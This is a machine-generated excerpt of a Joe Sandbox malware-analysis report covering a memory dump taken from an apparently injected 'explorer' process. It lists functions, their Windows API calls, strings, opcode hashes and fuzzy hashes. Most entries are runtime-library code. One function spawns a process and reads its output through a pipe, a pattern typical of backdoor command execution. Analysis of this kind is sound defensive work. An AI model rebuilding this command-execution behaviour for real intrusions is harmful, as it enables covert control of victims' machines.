Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 12a64d44b2f69dc89d0b09c297f463408950f31a785602745555420ca2539de8
Instruction ID: edbc07556ec9e589525d1810a0db4efebd16ae63ce2f2adaa730f86df7f80c03
Opcode Fuzzy Hash: 12a64d44b2f69dc89d0b09c297f463408950f31a785602745555420ca2539de8
Instruction Fuzzy Hash: 92210432A10226ABEB189E24DC40B7A73ADEF46394B00017EEE01D6180EB75ED48DF50

Function 02F21EB5 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

EnumSystemLocalesW.KERNEL32(02F21FDB,00000001,00000000,?,-00000050,?,02F22609,00000000,?,?,?,00000055,?), ref: 02F21F27

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 0e5ee59f8c250f317caf1529e763a5989b4a645f3011d474e7ab675f9293bfc2
Instruction ID: 186b8627b95a0d0e322177ec7710a0418996100a2a50676f7382abab81b2cb5c
Opcode Fuzzy Hash: 0e5ee59f8c250f317caf1529e763a5989b4a645f3011d474e7ab675f9293bfc2
Instruction Fuzzy Hash: 261106376007055FEB189F39889067BB7A2FF813A8B14442CEA4B87601D371B407CB40

Function 02F2245A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02F221F7,00000000,00000000,?), ref: 02F22486

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: c55bf5be1020221766c538767ebd497341f78281a972593000ffb3f45fd8d693
Instruction ID: e3cbe1d069897146cc080f81c97950eaeb38922a9545e0115d5bfb96a825bf0a
Opcode Fuzzy Hash: c55bf5be1020221766c538767ebd497341f78281a972593000ffb3f45fd8d693
Instruction Fuzzy Hash: 8EF0F932E00121ABDB289A28CD05BBB7759EB41798F054469EE05A7281DB74F905C9E0

Function 02F21DC3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 02F21E17

Strings

utf8, xrefs: 02F21D86

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: utf8
API String ID: 2003897158-905460609
Opcode ID: fe0274ba5534a90020e65ac2714fa6401c029fa6e9f2f1fcb86394e8dd62cae7
Instruction ID: 995daef78139d07d3e5225e3cf6885fad4449b5158a1cde83390caa7454cce3c
Opcode Fuzzy Hash: fe0274ba5534a90020e65ac2714fa6401c029fa6e9f2f1fcb86394e8dd62cae7
Instruction Fuzzy Hash: 49F02832A40115ABD714AF74DC44EBB73EDDF493A0F00007EE606DB280EAB8AD05CB90

Function 02F21F50 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

EnumSystemLocalesW.KERNEL32(02F2222E,00000001,FFFFFFFF,?,-00000050,?,02F225CD,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 02F21F9A

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4ded1d3ebf6754a3f21bca5839abddaf561077fe0c5a86ec249f4a10dcce3cfd
Instruction ID: a36505020741d6a678609adaad6d170c1216838ed26aee24de562b5f3b058397
Opcode Fuzzy Hash: 4ded1d3ebf6754a3f21bca5839abddaf561077fe0c5a86ec249f4a10dcce3cfd
Instruction Fuzzy Hash: D2F0F636A003145FEB24AF759C84B7B7B96EF813A8F05452DFA098B680C772A846CA54

Function 02F17F0C Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F12100: EnterCriticalSection.KERNEL32(-00047B11,?,02F13427,00000000,02F43028,0000000C,02F133EE,?,?,02F1A24D,?,?,02F169C2,00000001,00000364,00000006), ref: 02F1210F

EnumSystemLocalesW.KERNEL32(02F17EFF,00000001,02F43248,0000000C,02F1832A,00000000), ref: 02F17F44

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 04392e55dbf9bfc7f5b307a8e1277a9f307deff3e2bc81ff8cbb5b1a84fb8be9
Instruction ID: 77836308effeb1c17f8903eb10e17ec1bbcd77c91b207ffa6046bbf8595b80c8
Opcode Fuzzy Hash: 04392e55dbf9bfc7f5b307a8e1277a9f307deff3e2bc81ff8cbb5b1a84fb8be9
Instruction Fuzzy Hash: FCF04F36A40204EFE700EF98D845B5DB7F1EB587A0F10451AE615AB290CBB549409F45

Function 02F21E6A Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

EnumSystemLocalesW.KERNEL32(02F21DC3,00000001,FFFFFFFF,?,?,02F2262B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 02F21EA1

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 374ddeace7e295bf3a557cb835af92d1f825ba471be8ee6c2f8e1db2d730fabb
Instruction ID: 9d499d91622ec0ecd6f1e4381cf8e5793228230227b59a05099a7928e9140c40
Opcode Fuzzy Hash: 374ddeace7e295bf3a557cb835af92d1f825ba471be8ee6c2f8e1db2d730fabb
Instruction Fuzzy Hash: 60F05536B0020457DB04AF35DC04B6BBF95EFC27A0B06045CEF0A8B251C6B1A847CB94

Function 02F1842E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,02F15784,?,20001004,00000000,00000002,?,?,02F14D91), ref: 02F18462

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6fd86540f2f90111ec99e044e918ade5880779324426b0d838dc017c4fcce579
Instruction ID: 18eae0f821074a94debe68865cb7895735d2faecc79bee943418960a61da2622
Opcode Fuzzy Hash: 6fd86540f2f90111ec99e044e918ade5880779324426b0d838dc017c4fcce579
Instruction Fuzzy Hash: 30E04F3294021CBBEF122F60DD08AAE7F1BEF447E1F408415FE0566261CF318920AE90

Function 02F0A2F8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002A304,02F09E18), ref: 02F0A2FD

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2b4bb37a74cb5cc9419a92b1adbf46170af8443d518913a302de0fa8d144b4b3
Instruction ID: 6cd2fc3d26d7717e08c8f6690674e12d7889b883a1eafaa05cd9f5a1d0d38b76
Opcode Fuzzy Hash: 2b4bb37a74cb5cc9419a92b1adbf46170af8443d518913a302de0fa8d144b4b3
Instruction Fuzzy Hash:

Function 02F20294 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 02F20294

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: bb22f7e1b7e7f6e7e488f54e1524c924e95b6e81958b64d7c7b1af709e87a820
Instruction ID: 8d34845ab734bd51a282d7b1f02719c2b9a2b753e07e7b16779f87cb5d1a391d
Opcode Fuzzy Hash: bb22f7e1b7e7f6e7e488f54e1524c924e95b6e81958b64d7c7b1af709e87a820
Instruction Fuzzy Hash: 9AA01270940104AF43404E30598420976D55500AC0304042E5004C0400DA7040A06701

Function 02EE8280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000080,?,?,?,?,?,?,?,?,?), ref: 02EE832D
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 02EE8403
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 02EE8415
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 02EE8459
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 02EE8481
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 02EE848F
WaitForSingleObject.KERNEL32(?,00000064), ref: 02EE84B8
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EE84DA
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EE84FE
ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 02EE8525
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EE856A
CloseHandle.KERNEL32(?), ref: 02EE8581
CloseHandle.KERNEL32(?), ref: 02EE8589
CloseHandle.KERNEL32(00000000), ref: 02EE8591
CloseHandle.KERNEL32(00000000), ref: 02EE8599
GetLastError.KERNEL32 ref: 02EE85A3

Strings

D, xrefs: 02EE83BC

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
String ID: D
API String ID: 3215130363-2746444292
Opcode ID: 12e301734eedc5c211aa77d9ac2d13cb26e47b45c3be58b612d88e870ea1eccf
Instruction ID: 768ad40716d2d7384cf58e04ab41d22cc5c025d05e39bd93aa94e2c70b4b6247
Opcode Fuzzy Hash: 12e301734eedc5c211aa77d9ac2d13cb26e47b45c3be58b612d88e870ea1eccf
Instruction Fuzzy Hash: 0BA17F71D8022CABEF25DB60CD45FDDB7BAAF04744F1041DAEA09A61D0DB75AA84CF90

Function 02F1FB31 Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 02F1FB5B
_free.LIBCMT ref: 02F1FC34
_free.LIBCMT ref: 02F1FC61

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: c5088ad3a90324c926df14df09cf070f3b5e97844f3776dba7ace64975d54fe4
Instruction ID: fc92ff98f78aad549d0a2e86af6818dc4a501da6878517572e9d4fa1499b19c9
Opcode Fuzzy Hash: c5088ad3a90324c926df14df09cf070f3b5e97844f3776dba7ace64975d54fe4
Instruction Fuzzy Hash: B5D106B6E00305AFDB25AFB48C40A6EB7E5AF053D4F94476DEB05A7680EB719500CF91

Function 02F12473 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F124E2
_free.LIBCMT ref: 02F124F8
_free.LIBCMT ref: 02F1250B
_free.LIBCMT ref: 02F12520
_free.LIBCMT ref: 02F12535
GetCPInfo.KERNEL32(?,?), ref: 02F1257F

Part of subcall function 02F1BC0D: _free.LIBCMT ref: 02F1BC78

_free.LIBCMT ref: 02F127EA
_free.LIBCMT ref: 02F127FD
_free.LIBCMT ref: 02F1280B
_free.LIBCMT ref: 02F12816
_free.LIBCMT ref: 02F12858
_free.LIBCMT ref: 02F12860
_free.LIBCMT ref: 02F12866
_free.LIBCMT ref: 02F1286E
_free.LIBCMT ref: 02F1287C

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 795702d2abae2d32b0a47ae9a89ab84add25527c8c9ca0390c31f533955d4396
Instruction ID: 02d972a54cd15c88e6b97ef70bd41721a96390e1b294e11495a91adfbad6d21f
Opcode Fuzzy Hash: 795702d2abae2d32b0a47ae9a89ab84add25527c8c9ca0390c31f533955d4396
Instruction Fuzzy Hash: 20D19E71D002159FDB21DFA8C880BEEBBF5BF08390F544169EA99E7281DB75A845CB60

Function 02F096EA Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(02F47FA8,00000FA0,?,?,02F096C8), ref: 02F096F6
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,02F096C8), ref: 02F09701
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,02F096C8), ref: 02F09712
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 02F09724
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 02F09732
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,02F096C8), ref: 02F09755
DeleteCriticalSection.KERNEL32(02F47FA8,00000007,?,?,02F096C8), ref: 02F09771
CloseHandle.KERNEL32(00000000,?,?,02F096C8), ref: 02F09781

Strings

WakeAllConditionVariable, xrefs: 02F0972A
api-ms-win-core-synch-l1-2-0.dll, xrefs: 02F096FC
kernel32.dll, xrefs: 02F0970D
SleepConditionVariableCS, xrefs: 02F0971E

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: f18a15d6eb3b09ddc14cae1e83a7dd4dfc8909cba4d16917bcf8e18402a2dead
Instruction ID: 15f5a750a9d228328cec886a63c159cd404e175a1eaa66f9ef55b5a51310ea14
Opcode Fuzzy Hash: f18a15d6eb3b09ddc14cae1e83a7dd4dfc8909cba4d16917bcf8e18402a2dead
Instruction Fuzzy Hash: 4201B575EC13095BF7212F74AD48A26FB99BF40FE1B040D55FA05D2581EFF0C81086A0

Function 02F211AF Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 02F211F3

Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204C6
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204D8
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204EA
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204FC
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2050E
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20520
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20532
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20544
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20556
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20568
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2057A
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2058C
Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2059E

_free.LIBCMT ref: 02F211E8

Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E

_free.LIBCMT ref: 02F2120A
_free.LIBCMT ref: 02F2121F
_free.LIBCMT ref: 02F2122A
_free.LIBCMT ref: 02F2124C
_free.LIBCMT ref: 02F2125F
_free.LIBCMT ref: 02F2126D
_free.LIBCMT ref: 02F21278
_free.LIBCMT ref: 02F212B0
_free.LIBCMT ref: 02F212B7
_free.LIBCMT ref: 02F212D4
_free.LIBCMT ref: 02F212EC

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 23abe24928e9fc63c49866b33075412a0c5a93cca5284a06fde856bf9b646986
Instruction ID: 46cc169b5541785466ac69f28c6ee139d9048c15e88b9c563f56ccde13ad0e7d
Opcode Fuzzy Hash: 23abe24928e9fc63c49866b33075412a0c5a93cca5284a06fde856bf9b646986
Instruction Fuzzy Hash: 39317A71A002149FEB31AE78DD04F5BB7EAAF023D0F604419E64DE6191DF35A888CF64

Function 02F205A7 Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F205EF
_free.LIBCMT ref: 02F20613
_free.LIBCMT ref: 02F20620
_free.LIBCMT ref: 02F20645
_free.LIBCMT ref: 02F20652
_free.LIBCMT ref: 02F2065B
_free.LIBCMT ref: 02F20935
_free.LIBCMT ref: 02F2093D

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
